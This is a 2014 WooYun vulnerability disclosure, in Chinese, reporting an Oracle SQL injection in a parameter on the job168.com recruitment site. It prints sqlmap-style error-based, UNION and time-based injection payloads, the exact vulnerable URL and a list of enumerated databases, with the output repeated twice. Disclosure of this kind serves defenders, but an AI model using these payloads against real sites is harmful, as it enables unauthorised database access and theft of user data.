南方人才网oracle注射漏洞一枚

发表于 2014年12月25日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-088502

漏洞标题：南方人才网oracle注射漏洞一枚

漏洞详情

披露状态：

2014-12-25: 积极联系厂商并且等待厂商认领中，细节不对外公开
2015-02-08: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

oracle注射

详细说明：

Place: GET<br>
Parameter: unit_no<br>
    Type: error-based<br>
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)<br>
    Payload: unit_no=381312002' AND 7892=(SELECT UPPER(XMLType(CHR(60)||CHR(58)|<br>
|CHR(121)||CHR(121)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7892=7892) THEN 1 EL<br>
SE 0 END) FROM DUAL)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(58)||CHR(62)))<br>
FROM DUAL) AND 'hpsA'='hpsAType: UNION query<br>
    Title: Generic UNION query (NULL) - 6 columns<br>
    Payload: unit_no=381312002' UNION ALL SELECT NULL,CHR(58)||CHR(121)||CHR(121<br>
)||CHR(118)||CHR(58)||CHR(108)||CHR(111)||CHR(74)||CHR(75)||CHR(103)||CHR(102)||<br>
CHR(76)||CHR(72)||CHR(65)||CHR(120)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(<br>
58),NULL,NULL,NULL,NULL FROM DUAL--Type: AND/OR time-based blind<br>
    Title: Oracle AND time-based blind<br>
    Payload: unit_no=381312002' AND 1616=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(<br>
100)||CHR(87)||CHR(105),5) AND 'UlJq'='UlJq<br>
---<br>
[22:19:20] [INFO] the back-end DBMS is Oracle<br>
web application technology: JSP<br>
back-end DBMS: Oracle

Place: GET

Parameter: unit_no

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: unit_no=381312002' AND 7892=(SELECT UPPER(XMLType(CHR(60)||CHR(58)|

|CHR(121)||CHR(121)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7892=7892) THEN 1 EL

SE 0 END) FROM DUAL)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(58)||CHR(62)))

FROM DUAL) AND 'hpsA'='hpsAType: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: unit_no=381312002' UNION ALL SELECT NULL,CHR(58)||CHR(121)||CHR(121

)||CHR(118)||CHR(58)||CHR(108)||CHR(111)||CHR(74)||CHR(75)||CHR(103)||CHR(102)||

CHR(76)||CHR(72)||CHR(65)||CHR(120)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(

58),NULL,NULL,NULL,NULL FROM DUAL--Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: unit_no=381312002' AND 1616=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(

100)||CHR(87)||CHR(105),5) AND 'UlJq'='UlJq

---

[22:19:20] [INFO] the back-end DBMS is Oracle

web application technology: JSP

back-end DBMS: Oracle

漏洞证明：

available databases [15]:<br>
[*] BBS<br>
[*] CORE<br>
[*] DBSNMP<br>
[*] GZZP<br>
[*] IPTV<br>
[*] NFRC<br>
[*] OEM_JOB168_CPXT<br>
[*] OUTLN<br>
[*] PERFSTAT<br>
[*] SYS<br>
[*] SYSMAN<br>
[*] SYSTEM<br>
[*] TEST<br>
[*] TSMSYS<br>
[*] WMSYS

available databases [15]:

[*] BBS

[*] CORE

[*] DBSNMP

[*] GZZP

[*] IPTV

[*] NFRC

[*] OEM_JOB168_CPXT

[*] OUTLN

[*] PERFSTAT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TEST

[*] TSMSYS

[*] WMSYS

www.job168.com/english/person/etcpos.jsp?unit_no=381312002

1	www.job168.com/english/person/etcpos.jsp?unit_no=381312002

修复方案：

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

评价

原文连接：南方人才网oracle注射漏洞一枚 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。